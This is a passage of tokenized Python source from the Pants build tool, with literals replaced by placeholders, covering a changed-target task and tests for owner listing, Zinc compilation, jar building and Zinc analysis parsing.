terminate ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . pailgun : <EOL> self . pailgun . server_close ( ) <EOL> super ( PailgunService , self ) . terminate ( ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import logging <EOL> from pants . task . changed_file_task_mixin import ChangedFileTaskMixin <EOL> from pants . task . noop_exec_task import NoopExecTask <EOL> logger = logging . getLogger ( __name__ ) <EOL> class ChangedTargetTask ( ChangedFileTaskMixin , NoopExecTask ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def register_options ( cls , register ) : <EOL> super ( ChangedTargetTask , cls ) . register_options ( register ) <EOL> cls . register_change_file_options ( register ) <EOL> @ classmethod <EOL> def alternate_target_roots ( cls , options , address_mapper , build_graph ) : <EOL> change_calculator = cls . change_calculator ( <EOL> options , <EOL> address_mapper , <EOL> build_graph ) <EOL> changed_addresses = change_calculator . changed_target_addresses ( ) <EOL> readable = '<STR_LIT>' . join ( sorted ( '<STR_LIT>' . format ( addr . reference ( ) ) for addr in changed_addresses ) ) <EOL> logger . info ( '<STR_LIT>' . format ( len ( changed_addresses ) , readable ) ) <EOL> return [ build_graph . get_target ( addr ) for addr in changed_addresses ] </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import sys <EOL> v = sys . version_info <EOL> print ( '<STR_LIT>' % v [ <NUM_LIT:0> : <NUM_LIT:3> ] ) <EOL> def say_hello ( ) : <EOL> print ( '<STR_LIT>' ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from textwrap import dedent <EOL> from pants . backend . graph_info . tasks . list_owners import ListOwners <EOL> from pants . backend . python . targets . python_library import PythonLibrary <EOL> from pants . base . exceptions import TaskError <EOL> from pants . build_graph . build_file_aliases import BuildFileAliases <EOL> from pants_test . tasks . task_test_base import ConsoleTaskTestBase <EOL> class ListOwnersTest ( ConsoleTaskTestBase ) : <EOL> @ classmethod <EOL> def task_type ( cls ) : <EOL> return ListOwners <EOL> @ property <EOL> def alias_groups ( self ) : <EOL> return BuildFileAliases ( targets = { '<STR_LIT>' : PythonLibrary } ) <EOL> def setUp ( self ) : <EOL> super ( ListOwnersTest , self ) . setUp ( ) <EOL> def add_to_build_file ( path , name , * sources ) : <EOL> all_sources = [ "<STR_LIT>" . format ( source ) for source in list ( sources ) ] <EOL> self . add_to_build_file ( path , dedent ( """<STR_LIT>""" . format ( name = name , all_sources = '<STR_LIT:U+002C>' . join ( all_sources ) ) ) ) <EOL> add_to_build_file ( '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT>' ) <EOL> add_to_build_file ( '<STR_LIT>' , '<STR_LIT:d>' , '<STR_LIT>' ) <EOL> add_to_build_file ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> add_to_build_file ( '<STR_LIT>' , '<STR_LIT:e>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> add_to_build_file ( '<STR_LIT:a>' , '<STR_LIT:c>' , '<STR_LIT>' ) <EOL> add_to_build_file ( '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) <EOL> add_to_build_file ( '<STR_LIT>' , '<STR_LIT:h>' , '<STR_LIT>' ) <EOL> def test_no_targets ( self ) : <EOL> self . assert_console_output ( passthru_args = [ '<STR_LIT>' ] ) <EOL> def test_no_targets_output_format_json ( self ) : <EOL> self . assert_console_output ( dedent ( """<STR_LIT>""" ) . lstrip ( '<STR_LIT:\n>' ) , <EOL> passthru_args = [ '<STR_LIT>' ] , <EOL> options = { '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> def test_one_target ( self ) : <EOL> self . assert_console_output ( '<STR_LIT>' , passthru_args = [ '<STR_LIT>' ] ) <EOL> def test_one_target_output_format_json ( self ) : <EOL> self . assert_console_output ( dedent ( """<STR_LIT>""" ) . lstrip ( '<STR_LIT:\n>' ) , <EOL> passthru_args = [ '<STR_LIT>' ] , <EOL> options = { '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> def test_multiple_targets ( self ) : <EOL> self . assert_console_output ( '<STR_LIT>' , '<STR_LIT>' , passthru_args = [ '<STR_LIT>' ] ) <EOL> def test_multiple_targets_output_format_json ( self ) : <EOL> self . assert_console_output ( dedent ( """<STR_LIT>""" ) . lstrip ( '<STR_LIT:\n>' ) , <EOL> passthru_args = [ '<STR_LIT>' ] , <EOL> options = { '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> def test_target_in_parent_directory ( self ) : <EOL> self . assert_console_output ( '<STR_LIT>' , passthru_args = [ '<STR_LIT>' ] ) <EOL> def test_multiple_targets_one_in_parent_directory ( self ) : <EOL> self . assert_console_output ( '<STR_LIT>' , '<STR_LIT>' , passthru_args = [ '<STR_LIT>' ] ) <EOL> def test_target_with_multiple_sources ( self ) : <EOL> self . assert_console_output ( '<STR_LIT>' , passthru_args = [ '<STR_LIT>' ] ) <EOL> def test_no_sources ( self ) : <EOL> self . assert_console_raises ( TaskError , passthru_args = [ ] ) <EOL> def test_too_many_sources_output_format_text ( self ) : <EOL> self . assert_console_raises ( TaskError , passthru_args = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_multiple_sources_output_format_json ( self ) : <EOL> self . assert_console_output ( dedent ( """<STR_LIT>""" ) . lstrip ( '<STR_LIT:\n>' ) , <EOL> passthru_args = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> options = { '<STR_LIT>' : '<STR_LIT>' } <EOL> ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import os <EOL> from pants . build_graph . address import Address <EOL> from pants . build_graph . target import Target <EOL> from pants_test . backend . jvm . tasks . jvm_compile . base_compile_integration_test import BaseCompileIT <EOL> class ZincCompileIntegrationTest ( BaseCompileIT ) : <EOL> def test_java_src_zinc_compile ( self ) : <EOL> with self . do_test_compile ( '<STR_LIT>' ) : <EOL> pass <EOL> with self . do_test_compile ( '<STR_LIT>' ) : <EOL> pass <EOL> def test_in_process ( self ) : <EOL> with self . temporary_workdir ( ) as workdir : <EOL> with self . temporary_cachedir ( ) as cachedir : <EOL> pants_run = self . run_test_compile ( <EOL> workdir , cachedir , '<STR_LIT>' , <EOL> extra_args = [ '<STR_LIT>' ] , clean_all = True <EOL> ) <EOL> self . assertIn ( '<STR_LIT>' , pants_run . stdout_data ) <EOL> self . assertNotIn ( '<STR_LIT>' , pants_run . stdout_data ) <EOL> def test_log_level ( self ) : <EOL> with self . temporary_workdir ( ) as workdir : <EOL> with self . temporary_cachedir ( ) as cachedir : <EOL> target = '<STR_LIT>' <EOL> pants_run = self . run_test_compile ( <EOL> workdir , cachedir , target , <EOL> extra_args = [ '<STR_LIT>' ] , clean_all = True <EOL> ) <EOL> self . assertIn ( '<STR_LIT>' , pants_run . stdout_data ) <EOL> self . assertIn ( '<STR_LIT>' , pants_run . stdout_data ) <EOL> def test_unicode_source_symbol ( self ) : <EOL> with self . temporary_workdir ( ) as workdir : <EOL> with self . temporary_cachedir ( ) as cachedir : <EOL> target = '<STR_LIT>' <EOL> pants_run = self . run_test_compile ( <EOL> workdir , cachedir , target , <EOL> extra_args = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( cachedir ) , <EOL> ] , <EOL> clean_all = True , <EOL> ) <EOL> self . assert_success ( pants_run ) <EOL> def test_apt_compile ( self ) : <EOL> with self . do_test_compile ( '<STR_LIT>' , <EOL> expected_files = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) as found : <EOL> self . assertTrue ( <EOL> self . get_only ( found , '<STR_LIT>' ) . endswith ( <EOL> '<STR_LIT>' ) ) <EOL> processor_service_files = found [ '<STR_LIT>' ] <EOL> self . assertEqual ( <NUM_LIT:1> , len ( processor_service_files ) ) <EOL> processor_service_file = list ( processor_service_files ) [ <NUM_LIT:0> ] <EOL> self . assertTrue ( processor_service_file . endswith ( <EOL> '<STR_LIT>' ) ) <EOL> with open ( processor_service_file ) as fp : <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> fp . read ( ) . strip ( ) ) <EOL> def test_apt_compile_and_run ( self ) : <EOL> with self . do_test_compile ( '<STR_LIT>' , <EOL> expected_files = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) as found : <EOL> self . assertTrue ( <EOL> self . get_only ( found , '<STR_LIT>' ) . endswith ( <EOL> '<STR_LIT>' ) ) <EOL> with open ( self . get_only ( found , '<STR_LIT>' ) ) as fp : <EOL> self . assertIn ( '<STR_LIT>' , fp . read ( ) . splitlines ( ) ) <EOL> def test_stale_apt_with_deps ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . do_test_compile ( <EOL> '<STR_LIT>' , <EOL> expected_files = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) as found : <EOL> gen_file = self . get_only ( found , '<STR_LIT>' ) <EOL> self . assertTrue ( gen_file . endswith ( <EOL> '<STR_LIT>' ) , <EOL> msg = '<STR_LIT>' . format ( gen_file ) ) <EOL> with self . temporary_workdir ( ) as workdir : <EOL> with self . temporary_cachedir ( ) as cachedir : <EOL> self . assert_success ( self . run_test_compile ( <EOL> workdir , <EOL> cachedir , <EOL> '<STR_LIT>' ) ) <EOL> self . assert_success ( self . run_test_compile ( <EOL> workdir , <EOL> cachedir , <EOL> '<STR_LIT>' , <EOL> clean_all = False ) ) <EOL> def test_fatal_warning ( self ) : <EOL> def test_combination ( target , default_fatal_warnings , expect_success ) : <EOL> with self . temporary_workdir ( ) as workdir : <EOL> with self . temporary_cachedir ( ) as cachedir : <EOL> if default_fatal_warnings : <EOL> arg = '<STR_LIT>' <EOL> else : <EOL> arg = '<STR_LIT>' <EOL> pants_run = self . run_test_compile ( <EOL> workdir , <EOL> cachedir , <EOL> '<STR_LIT>' . format ( target ) , <EOL> extra_args = [ arg , '<STR_LIT>' ] ) <EOL> if expect_success : <EOL> self . assert_success ( pants_run ) <EOL> else : <EOL> self . assert_failure ( pants_run ) <EOL> test_combination ( '<STR_LIT>' , default_fatal_warnings = True , expect_success = False ) <EOL> test_combination ( '<STR_LIT>' , default_fatal_warnings = False , expect_success = True ) <EOL> test_combination ( '<STR_LIT>' , default_fatal_warnings = True , expect_success = False ) <EOL> test_combination ( '<STR_LIT>' , default_fatal_warnings = False , expect_success = False ) <EOL> test_combination ( '<STR_LIT>' , default_fatal_warnings = True , expect_success = True ) <EOL> test_combination ( '<STR_LIT>' , default_fatal_warnings = False , expect_success = True ) <EOL> def test_record_classpath ( self ) : <EOL> target_spec = '<STR_LIT>' <EOL> target_id = Target . compute_target_id ( Address . parse ( target_spec ) ) <EOL> classpath_filename = '<STR_LIT>' . format ( target_id ) <EOL> with self . do_test_compile ( target_spec , <EOL> expected_files = [ classpath_filename , '<STR_LIT>' ] , <EOL> extra_args = [ '<STR_LIT>' ] ) as found : <EOL> found_classpath_file = self . get_only ( found , classpath_filename ) <EOL> self . assertTrue ( found_classpath_file <EOL> . endswith ( os . path . join ( '<STR_LIT>' , classpath_filename ) ) ) <EOL> with open ( found_classpath_file , '<STR_LIT:r>' ) as f : <EOL> self . assertIn ( target_id , f . read ( ) ) <EOL> def test_no_record_classpath ( self ) : <EOL> target_spec = '<STR_LIT>' <EOL> target_id = Target . compute_target_id ( Address . parse ( target_spec ) ) <EOL> classpath_filename = '<STR_LIT>' . format ( target_id ) <EOL> with self . do_test_compile ( target_spec , <EOL> expected_files = [ '<STR_LIT>' ] , <EOL> extra_args = [ '<STR_LIT>' ] ) as found : <EOL> self . assertFalse ( classpath_filename in found ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import os <EOL> import re <EOL> from contextlib import contextmanager <EOL> from textwrap import dedent <EOL> from six . moves import range <EOL> from twitter . common . collections import maybe_list <EOL> from pants . backend . jvm . targets . java_agent import JavaAgent <EOL> from pants . backend . jvm . targets . jvm_binary import JvmBinary <EOL> from pants . backend . jvm . tasks . jar_task import JarBuilderTask , JarTask <EOL> from pants . build_graph . build_file_aliases import BuildFileAliases <EOL> from pants . util . contextutil import open_zip , temporary_dir , temporary_file <EOL> from pants . util . dirutil import safe_mkdir , safe_mkdtemp , safe_rmtree <EOL> from pants_test . jvm . jar_task_test_base import JarTaskTestBase <EOL> class BaseJarTaskTest ( JarTaskTestBase ) : <EOL> @ property <EOL> def alias_groups ( self ) : <EOL> return super ( BaseJarTaskTest , self ) . alias_groups . merge ( BuildFileAliases ( <EOL> targets = { <EOL> '<STR_LIT>' : JavaAgent , <EOL> '<STR_LIT>' : JvmBinary , <EOL> } , <EOL> ) ) <EOL> def setUp ( self ) : <EOL> super ( BaseJarTaskTest , self ) . setUp ( ) <EOL> self . workdir = safe_mkdtemp ( ) <EOL> self . jar_task = self . prepare_execute ( self . context ( ) ) <EOL> def tearDown ( self ) : <EOL> super ( BaseJarTaskTest , self ) . tearDown ( ) <EOL> if self . workdir : <EOL> safe_rmtree ( self . workdir ) <EOL> @ contextmanager <EOL> def jarfile ( self ) : <EOL> with temporary_file ( root_dir = self . workdir , suffix = '<STR_LIT>' ) as fd : <EOL> fd . close ( ) <EOL> yield fd . name <EOL> def assert_listing ( self , jar , * expected_items ) : <EOL> self . assertEquals ( { '<STR_LIT>' , '<STR_LIT>' } | set ( expected_items ) , <EOL> set ( jar . namelist ( ) ) ) <EOL> class JarTaskTest ( BaseJarTaskTest ) : <EOL> MAX_SUBPROC_ARGS = <NUM_LIT:50> <EOL> class TestJarTask ( JarTask ) : <EOL> def execute ( self ) : <EOL> pass <EOL> @ classmethod <EOL> def task_type ( cls ) : <EOL> return cls . TestJarTask <EOL> def setUp ( self ) : <EOL> super ( JarTaskTest , self ) . setUp ( ) <EOL> self . set_options ( max_subprocess_args = self . MAX_SUBPROC_ARGS ) <EOL> self . jar_task = self . prepare_execute ( self . context ( ) ) <EOL> def test_update_write ( self ) : <EOL> with temporary_dir ( ) as chroot : <EOL> _path = os . path . join ( chroot , '<STR_LIT>' ) <EOL> safe_mkdir ( _path ) <EOL> data_file = os . path . join ( _path , '<STR_LIT>' ) <EOL> with open ( data_file , '<STR_LIT:w>' ) as fd : <EOL> fd . write ( '<STR_LIT:e>' ) <EOL> with self . jarfile ( ) as existing_jarfile : <EOL> with self . jar_task . open_jar ( existing_jarfile ) as jar : <EOL> jar . write ( data_file , '<STR_LIT>' ) <EOL> with open_zip ( existing_jarfile ) as jar : <EOL> self . assert_listing ( jar , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEquals ( '<STR_LIT:e>' , jar . read ( '<STR_LIT>' ) ) <EOL> def test_update_writestr ( self ) : <EOL> def assert_writestr ( path , contents , * entries ) : <EOL> with self . jarfile ( ) as existing_jarfile : <EOL> with self . jar_task . open_jar ( existing_jarfile ) as jar : <EOL> jar . writestr ( path , contents ) <EOL> with open_zip ( existing_jarfile ) as jar : <EOL> self . assert_listing ( jar , * entries ) <EOL> self . assertEquals ( contents , jar . read ( path ) ) <EOL> assert_writestr ( '<STR_LIT>' , b'<STR_LIT:b>' , '<STR_LIT>' ) <EOL> assert_writestr ( '<STR_LIT>' , b'<STR_LIT:d>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_overwrite_write ( self ) : <EOL> with temporary_dir ( ) as chroot : <EOL> _path = os . path . join ( chroot , '<STR_LIT>' ) <EOL> safe_mkdir ( _path ) <EOL> data_file = os . path . join ( _path , '<STR_LIT>' ) <EOL> with open ( data_file , '<STR_LIT:w>' ) as fd : <EOL> fd . write ( '<STR_LIT:e>' ) <EOL> with self . jarfile ( ) as existing_jarfile : <EOL> with self . jar_task . open_jar ( existing_jarfile , overwrite = True ) as jar : <EOL> jar . write ( data_file , '<STR_LIT>' ) <EOL> with open_zip ( existing_jarfile ) as jar : <EOL> self . assert_listing ( jar , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEquals ( '<STR_LIT:e>' , jar . read ( '<STR_LIT>' ) ) <EOL> def test_overwrite_writestr ( self ) : <EOL> with self . jarfile ( ) as existing_jarfile : <EOL> with self . jar_task . open_jar ( existing_jarfile , overwrite = True ) as jar : <EOL> jar . writestr ( '<STR_LIT>' , b'<STR_LIT>' ) <EOL> with open_zip ( existing_jarfile ) as jar : <EOL> self . assert_listing ( jar , '<STR_LIT>' ) <EOL> self . assertEquals ( '<STR_LIT>' , jar . read ( '<STR_LIT>' ) ) <EOL> def test_custom_manifest ( self ) : <EOL> contents = b'<STR_LIT>' <EOL> with self . jarfile ( ) as existing_jarfile : <EOL> with self . jar_task . open_jar ( existing_jarfile , overwrite = True ) as jar : <EOL> jar . writestr ( '<STR_LIT>' , b'<STR_LIT>' ) <EOL> with open_zip ( existing_jarfile ) as jar : <EOL> self . assert_listing ( jar , '<STR_LIT>' ) <EOL> self . assertEquals ( '<STR_LIT>' , jar . read ( '<STR_LIT>' ) ) <EOL> self . assertNotEqual ( contents , jar . read ( '<STR_LIT>' ) ) <EOL> with self . jar_task . open_jar ( existing_jarfile , overwrite = False ) as jar : <EOL> jar . writestr ( '<STR_LIT>' , contents ) <EOL> with open_zip ( existing_jarfile ) as jar : <EOL> self . assert_listing ( jar , '<STR_LIT>' ) <EOL> self . assertEquals ( '<STR_LIT>' , jar . read ( '<STR_LIT>' ) ) <EOL> self . assertEquals ( contents , jar . read ( '<STR_LIT>' ) ) <EOL> def test_classpath ( self ) : <EOL> def manifest_content ( classpath ) : <EOL> return ( b'<STR_LIT>' + <EOL> b'<STR_LIT>' + <EOL> b'<STR_LIT>' ) . format ( <EOL> '<STR_LIT:U+0020>' . join ( maybe_list ( classpath ) ) ) <EOL> def assert_classpath ( classpath ) : <EOL> with self . jarfile ( ) as existing_jarfile : <EOL> with self . jar_task . open_jar ( existing_jarfile ) as jar : <EOL> jar . append_classpath ( os . path . join ( self . workdir , '<STR_LIT>' ) ) <EOL> with self . jar_task . open_jar ( existing_jarfile ) as jar : <EOL> jar . append_classpath ( [ os . path . join ( self . workdir , jar_path ) for jar_path in classpath ] ) <EOL> with open_zip ( existing_jarfile ) as jar : <EOL> self . assertEqual ( manifest_content ( classpath ) , jar . read ( '<STR_LIT>' ) ) <EOL> assert_classpath ( [ '<STR_LIT>' ] ) <EOL> assert_classpath ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_update_jars ( self ) : <EOL> with self . jarfile ( ) as main_jar : <EOL> with self . jarfile ( ) as included_jar : <EOL> with self . jar_task . open_jar ( main_jar ) as jar : <EOL> jar . writestr ( '<STR_LIT>' , b'<STR_LIT:c>' ) <EOL> with self . jar_task . open_jar ( included_jar ) as jar : <EOL> jar . writestr ( '<STR_LIT>' , b'<STR_LIT:g>' ) <EOL> with self . jar_task . open_jar ( main_jar ) as jar : <EOL> jar . writejar ( included_jar ) <EOL> with open_zip ( main_jar ) as jar : <EOL> self . assert_listing ( jar , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_overwrite_jars ( self ) : <EOL> with self . jarfile ( ) as main_jar : <EOL> with self . jarfile ( ) as included_jar : <EOL> with self . jar_task . open_jar ( main_jar ) as jar : <EOL> jar . writestr ( '<STR_LIT>' , b'<STR_LIT:c>' ) <EOL> with self . jar_task . open_jar ( included_jar ) as jar : <EOL> jar . writestr ( '<STR_LIT>' , b'<STR_LIT:g>' ) <EOL> with self . jar_task . open_jar ( main_jar , overwrite = True ) as jar : <EOL> for i in range ( self . MAX_SUBPROC_ARGS + <NUM_LIT:1> ) : <EOL> jar . writejar ( included_jar ) <EOL> with open_zip ( main_jar ) as jar : <EOL> self . assert_listing ( jar , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class JarBuilderTest ( BaseJarTaskTest ) : <EOL> class TestJarBuilderTask ( JarBuilderTask ) : <EOL> def execute ( self ) : <EOL> pass <EOL> @ classmethod <EOL> def task_type ( cls ) : <EOL> return cls . TestJarBuilderTask <EOL> def setUp ( self ) : <EOL> super ( JarBuilderTest , self ) . setUp ( ) <EOL> self . set_options ( max_subprocess_args = <NUM_LIT:100> ) <EOL> def test_agent_manifest ( self ) : <EOL> self . add_to_build_file ( '<STR_LIT>' , dedent ( """<STR_LIT>""" ) . strip ( ) ) <EOL> java_agent = self . target ( '<STR_LIT>' ) <EOL> context = self . context ( target_roots = [ java_agent ] ) <EOL> jar_builder_task = self . prepare_execute ( context ) <EOL> self . add_to_runtime_classpath ( context , java_agent , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with self . jarfile ( ) as existing_jarfile : <EOL> with jar_builder_task . open_jar ( existing_jarfile ) as jar : <EOL> with jar_builder_task . create_jar_builder ( jar ) as jar_builder : <EOL> jar_builder . add_target ( java_agent ) <EOL> with open_zip ( existing_jarfile ) as jar : <EOL> self . assert_listing ( jar , '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , jar . read ( '<STR_LIT>' ) ) <EOL> manifest = jar . read ( '<STR_LIT>' ) . strip ( ) <EOL> all_entries = dict ( tuple ( re . split ( r'<STR_LIT>' , line , <NUM_LIT:1> ) ) for line in manifest . splitlines ( ) ) <EOL> expected_entries = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:true>' , <EOL> '<STR_LIT>' : '<STR_LIT:true>' , <EOL> '<STR_LIT>' : '<STR_LIT:true>' , <EOL> } <EOL> self . assertEquals ( set ( expected_entries . items ( ) ) , <EOL> set ( expected_entries . items ( ) ) . intersection ( set ( all_entries . items ( ) ) ) ) <EOL> def test_manifest_items ( self ) : <EOL> self . add_to_build_file ( '<STR_LIT>' , dedent ( """<STR_LIT>""" ) . strip ( ) ) <EOL> binary_target = self . target ( '<STR_LIT>' ) <EOL> context = self . context ( target_roots = [ binary_target ] ) <EOL> self . add_to_runtime_classpath ( context , binary_target , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> jar_builder_task = self . prepare_execute ( context ) <EOL> with self . jarfile ( ) as existing_jarfile : <EOL> with jar_builder_task . open_jar ( existing_jarfile ) as jar : <EOL> with jar_builder_task . create_jar_builder ( jar ) as jar_builder : <EOL> jar_builder . add_target ( binary_target ) <EOL> with open_zip ( existing_jarfile ) as jar : <EOL> manifest = jar . read ( '<STR_LIT>' ) . strip ( ) <EOL> all_entries = dict ( tuple ( re . split ( r'<STR_LIT>' , line , <NUM_LIT:1> ) ) for line in manifest . splitlines ( ) ) <EOL> expected_entries = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> self . assertEquals ( set ( expected_entries . items ( ) ) , <EOL> set ( expected_entries . items ( ) ) . intersection ( set ( all_entries . items ( ) ) ) ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import os <EOL> import shutil <EOL> import StringIO <EOL> import unittest <EOL> import zipfile <EOL> from contextlib import contextmanager <EOL> import six <EOL> from pants . backend . jvm . zinc . zinc_analysis import ZincAnalysis <EOL> from pants . backend . jvm . zinc . zinc_analysis_element import ZincAnalysisElement <EOL> from pants . backend . jvm . zinc . zinc_analysis_parser import ZincAnalysisParser <EOL> from pants . util . contextutil import Timer , environment_as , temporary_dir <EOL> _TEST_DATA_SOURCE_ENV_VAR = '<STR_LIT>' <EOL> @ contextmanager <EOL> def _temp_test_dir ( zipfile_name ) : <EOL> """<STR_LIT>""" <EOL> zipfile_path = os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' , zipfile_name ) <EOL> with temporary_dir ( ) as tmpdir : <EOL> zf = zipfile . ZipFile ( zipfile_path , '<STR_LIT:r>' ) <EOL> zf . extractall ( tmpdir ) <EOL> yield tmpdir <EOL> class ZincAnalysisTestBase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . maxDiff = None <EOL> self . total_time = <NUM_LIT:0> <EOL> def _time ( self , work , msg ) : <EOL> with Timer ( ) as timer : <EOL> ret = work ( ) <EOL> elapsed = timer . elapsed <EOL> print ( '<STR_LIT>' % ( msg , elapsed ) ) <EOL> self . total_time += elapsed <EOL> return ret <EOL> class ZincAnalysisTestSimple ( ZincAnalysisTestBase ) : <EOL> def test_simple ( self ) : <EOL> with environment_as ( ZINCUTILS_SORTED_ANALYSIS = '<STR_LIT:1>' ) : <EOL> def get_test_analysis_path ( name ) : <EOL> return os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' , '<STR_LIT>' , name ) <EOL> def get_analysis_text ( name ) : <EOL> with open ( get_test_analysis_path ( name ) , '<STR_LIT:r>' ) as fp : <EOL> return fp . read ( ) <EOL> def parse_analyis ( name ) : <EOL> return ZincAnalysisParser ( ) . parse_from_path ( get_test_analysis_path ( name ) ) <EOL> def analysis_to_string ( analysis ) : <EOL> buf = StringIO . StringIO ( ) <EOL> analysis . write ( buf ) <EOL> return buf . getvalue ( ) <EOL> full_analysis = parse_analyis ( '<STR_LIT>' ) <EOL> analysis_splits = full_analysis . split ( [ <EOL> [ b'<STR_LIT>' ] , <EOL> [ b'<STR_LIT>' ] , <EOL> ] ) <EOL> self . assertEquals ( len ( analysis_splits ) , <NUM_LIT:2> ) <EOL> def compare_split ( i ) : <EOL> expected_filename = '<STR_LIT>' . format ( i ) <EOL> expected_analyis = parse_analyis ( expected_filename ) <EOL> self . assertTrue ( expected_analyis . is_equal_to ( analysis_splits [ i ] ) ) <EOL> expected = get_analysis_text ( expected_filename ) <EOL> actual = analysis_to_string ( analysis_splits [ i ] ) <EOL> self . assertMultiLineEqual ( expected , actual ) <EOL> compare_split ( <NUM_LIT:0> ) <EOL> compare_split ( <NUM_LIT:1> ) <EOL> merged_analysis = ZincAnalysis . merge ( analysis_splits ) <EOL> self . assertTrue ( full_analysis . is_equal_to ( merged_analysis ) ) <EOL> expected = get_analysis_text ( '<STR_LIT>' ) <EOL> actual = analysis_to_string ( merged_analysis ) <EOL> self . assertMultiLineEqual ( expected , actual ) <EOL> orig = iter ( get_analysis_text ( '<STR_LIT>' ) . splitlines ( True ) ) <EOL> expected_rebased = get_analysis_text ( '<STR_LIT>' ) <EOL> buf = StringIO . StringIO ( ) <EOL> ZincAnalysisParser ( ) . rebase ( orig , buf , b'<STR_LIT>' , b'<STR_LIT>' ) <EOL> rebased = buf . getvalue ( ) <EOL> self . assertMultiLineEqual ( expected_rebased , rebased ) <EOL> orig = iter ( get_analysis_text ( '<STR_LIT>' ) . splitlines ( True ) ) <EOL> expected_filtered_rebased = get_analysis_text ( '<STR_LIT>' ) <EOL> buf = StringIO . StringIO ( ) <EOL> ZincAnalysisParser ( ) . rebase ( orig , buf , b'<STR_LIT>' , b'<STR_LIT>' , <EOL> b'<STR_LIT>' ) <EOL> filtered_rebased = buf . getvalue ( ) <EOL> self . assertMultiLineEqual ( expected_filtered_rebased , filtered_rebased ) <EOL> infile = iter ( get_analysis_text ( '<STR_LIT>' ) . splitlines ( True ) ) <EOL> deps = ZincAnalysisParser ( ) . parse_deps ( infile , '<STR_LIT>' ) <EOL> f = '<STR_LIT>' <EOL> self . assertItemsEqual ( deps [ f ] , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> class ZincAnalysisTestComplex ( ZincAnalysisTestBase ) : <EOL> def test_complex ( self ) : <EOL> with environment_as ( ZINCUTILS_SORTED_ANALYSIS = '<STR_LIT:1>' ) : <EOL> if os . environ . get ( _TEST_DATA_SOURCE_ENV_VAR ) : <EOL> print ( '<STR_LIT>' . format ( <EOL> _TEST_DATA_SOURCE_ENV_VAR ) ) <EOL> self . _generate_testworthy_splits ( ) <EOL> return <EOL> parser = ZincAnalysisParser ( ) <EOL> with _temp_test_dir ( '<STR_LIT>' ) as testdir : <EOL> analysis_files = [ os . path . join ( testdir , f ) <EOL> for f in os . listdir ( testdir ) <EOL> if f . endswith ( b'<STR_LIT>' ) and not f . endswith ( b'<STR_LIT>' ) ] <EOL> num_analyses = len ( analysis_files ) <EOL> def parse ( f ) : <EOL> return parser . parse_from_path ( f ) <EOL> analyses = self . _time ( lambda : [ parse ( f ) for f in analysis_files ] , <EOL> '<STR_LIT>' % num_analyses ) <EOL> writeout_dir = os . path . join ( testdir , b'<STR_LIT>' ) <EOL> os . mkdir ( writeout_dir ) <EOL> def write ( file_name , analysis ) : <EOL> outpath = os . path . join ( writeout_dir , file_name ) <EOL> analysis . write_to_path ( outpath ) <EOL> def _write_all ( ) : <EOL> for analysis_file , analysis in zip ( analysis_files , analyses ) : <EOL> write ( os . path . basename ( analysis_file ) , analysis ) <EOL> self . _time ( _write_all , '<STR_LIT>' % num_analyses ) <EOL> merged_analysis = self . _time ( lambda : ZincAnalysis . merge ( analyses ) , <EOL> '<STR_LIT>' % num_analyses ) <EOL> merged_analysis_path = os . path . join ( writeout_dir , b'<STR_LIT>' ) <EOL> self . _time ( lambda : merged_analysis . write_to_path ( merged_analysis_path ) , <EOL> '<STR_LIT>' % merged_analysis_path ) <EOL> merged_analysis2 = self . _time ( lambda : parser . parse_from_path ( merged_analysis_path ) , <EOL> '<STR_LIT>' % merged_analysis_path ) <EOL> expected_merged_analysis_path = os . path . join ( testdir , b'<STR_LIT>' ) <EOL> expected_merged_analysis = self . _time ( <EOL> lambda : parser . parse_from_path ( expected_merged_analysis_path ) , <EOL> '<STR_LIT>' % expected_merged_analysis_path ) <EOL> diffs = merged_analysis . diff ( merged_analysis2 ) 